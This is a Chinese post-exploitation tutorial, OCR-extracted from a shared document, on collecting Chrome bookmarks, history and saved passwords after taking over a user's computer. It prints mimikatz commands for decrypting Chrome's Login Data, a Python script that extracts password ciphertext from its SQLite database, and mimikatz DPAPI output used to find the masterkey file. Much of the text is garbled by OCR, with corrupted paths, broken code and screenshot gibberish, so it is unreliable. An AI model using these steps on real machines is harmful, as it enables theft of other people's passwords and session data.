《2024获取浏览器相关敏感信息.docx》由会员分享,可在线阅读,更多相关《2024获取浏览器相关敏感信息.docx(11页珍藏版)》请在优知文库上搜索。
1、获取浏览器相关敏感信息当我们获取特定用户的计算机权限后,为了深入分析目标的业务逻辑(浏览器访问行为),从而定位我们感兴趣数据或系统的位置,可以尝试收集该用户常用浏览器的访问书签、访问记录、cookie、保存的密码等敏感信息。0x00获取ChrOme浏览器保存的敏感信息OxOOa获取书签信息chrome浏览器的用书签保存在C:UserstestAppData1.ocalGoogleChromeUserDataDefaultBookmarks,该文件为json格式的文本文件,通过分析用户的书签,可以确定用户常访问的网站,从而找到可能存在关键数据的网站系统。本文均以test用户为例进行讨论OxOOb
2、获取访问记录ChrOme浏览器的用户访问记录保存在C:UserstestAppData1.ocalGoogleChromeUserDataHefauKHistory的UrIS表中,该文件为SQlJte数据库文件,可以使用SQliteStiJdio打开直看。ASQUteStMdio(3.3.J)EurH(toseStaictureVwTOeUHdp0A1ouF-XZ三OC三MW9X3。tB的累触发23IO1.V1Hi*tey(SQUteJ)2,T皿”(12)CrHviwFcrwiBQ-OOOQQiQO.MXM帆IX3T.Ttlr广v*14sUvltitleI1ChgmesoUCSDN-WlbTR
3、*t三ft1typ4a,catAtl*twvisatwtiaHidiM013266137266724072匚3mloU,aict22h*tpspasspo匚knr1.r悟金44hctpsvww.b*idu1.55tppMpoftcdnzwVHA三三401326613753eS42C0066ht*mw.bduxort.burp4ueSP)S停止.三511W10132661M9M872071?7kctpswww.bduQViHMW99hetp1,threatbook.crv5/.-IXW2013266131W60117EfttE1010hnptJMhrtbookWvR一i三11亍In11ktp$y
4、/27.152.ia5.l20/403Forbidden110132661462124918311326614625O16M261212EgUB笈电至同安全!M*.河晦至31U26612921OM7可以使用上网行为分析工具对C:UserstestAppData1.ocalGoogleChromeUserDatamefauRHistory”文件进行分析,研究用户的浏览器使用规律、常访问网站等言息,从而找到可能存在关键数据的网站系统、制定针对该用户的进一步分析利用方案。页面访问停留总时间排名编号停留时间网页地址1250小时2250小时https:/thunlpGNNPapers3230小时http
5、s:/juejin.impost5a672Ibd5125733201c4a24180小时https:/5170小时https:/6170小时7160小时140小时9140小时https:/arxiv.org/abs/1809.0567910130小时https:/11130小时http:/39.106.118.77/12120小时.-.-OxOOc获取保存的密码ChrOme浏览器会将用户保存的密码储存在C:UserstestAppData1.ocalGoogleChromeUserDataXDefauItX1.oginData的IoginS表中,该文件为SQ1.ite数据库文件,可以使用SQI
6、iteStUdiO打开查看。SQUieSiudbo(MJ)1109mDMfQtebmwcr100kPaSSWOr(1.VaIUe字段即为用户保存密码的密文,ChrOme浏览器不同版本的浏览器对应的加密方式不同。在80之前的版本,密码使用DPAPI加密;在80.x之后的版本,使用AES-256-GCM进行加密。也可以通过密文格式来判断加密方式,如果密文以“v10”或“v1T为前缀,则代表对应的加密方式为AES-256GCM.80.x之前在线获取密码可以使用神器mimikatz获取Chrome浏览器保存的密码,需要以test用户权限执行命令:mimikatz.exelogdpapi:chrome/
7、in:C:UserstestAppData1.ocalGoogleChromeUserDataDefaultMoginData/unprotectexit80.X之前离线获取密码ChrOme储存的明文密码时使用WindoWS提供的DPAPI进行对称加密来保证安全性。加解密的密钥称为masterkey有目标用户明文密码的情况首先我们需要定位解密ChrOme数据库对应的MaSterKey文件。使用Python脚本读取1.OginData并保存到文件中,代码如下:fromosimportgetenvimportsqlite3importbinasciiconn=sqlite3.connect(1.o
8、ginData)cursor=conn.cursor()cursor.execute(SE1.ECTaction-url,username_value,password_valueFROMlogins,)forresultincursor.fetchall():print(binascii.b2a_hex(result2)f=open(test.txt,wb,)f.write(result2)f.close()脚本执行后,提取1.oginData中保存的密文,保存为test.txt获得该密文对应的MaSterKeyfile,mimikatz命令如下:mimikatz.exedpapi:blob
9、/in:test.ttexit获彳导又寸应guidMasterkey为alllb0f6-b4d7-40c8-b536-672a8288b958mimikatzttdpapi:blot)/in:c:ltest.txt*B1.OB*dwVersion00000001-1guidProviderdf9d8cd0-1501-lldl-8c7a-00c04fc297eb)dwMasterKeyVersion00000001-1guidMasterKealllb0f6-b4d7-40c8-b536-672a8288b958)dwFlags00000000-0()dwDescription1.en00000
10、002-2SzDescriptionalgCrpt00006610-26128(CA1.G_AES_256)%dwAlgCrypt1.en00010-256dwSalt1.en00000020-32pbSaltC5b242bce8a08ba6e83376b0120fa28e88430a2ccd5e58e3f30665bd0900ebadwHmacKey1.en00000000-0pbHmackKeyalgHash0000800e-32782(CR1.G_SHA_512)dwAlgHash1.en00000200-512dwHmac2Ke1.en00000020-32PbHmdCk2Keyadf
11、c4f753f2flf61dfe6042907dl0937e7db4abfeb407cabfa64f67192a8b95dwData1.en00000010-16pbData790249db2e4a74f755c44a27b5f39f2adwSign1.en00000040-64pbSign6efflc8bd30fl8600b3944e9ba8d31b7512155aea77ad3d4f5f76ec7Cd60535ce4eaeb5ac0b7d53ab99f98b04621ae56f5a6766709a293077730365fb7c05ef即MaSterKeyfile的路径为%APPDATA%
12、MicrosoftProtect%SID%alllb0f6-b4d740c8-b536-672a8288b958MaSterKey保存在MaSterKeyfiie中,使用用户密码的SHAl密文加密(NT1.MhaSh使用MD4力口密),所以获取到用户的NT1.Mhash并不能解密MaSterKeyfile获取MaSterKey。在获取目标用户明文密码的情况下可以使用ChromePaSS离线获取Chrorne保存的密码C解密需要获得三部分内容:1 .加密密钥(即MaSterKey文件),位于appdata%MicrosoftProtect下对应Sid文件夹下的文件2 .数据库文件1.OginData(C:UserstestAppData1.ocalGoogleChromeUserDataXDefauItX1.og
免费区 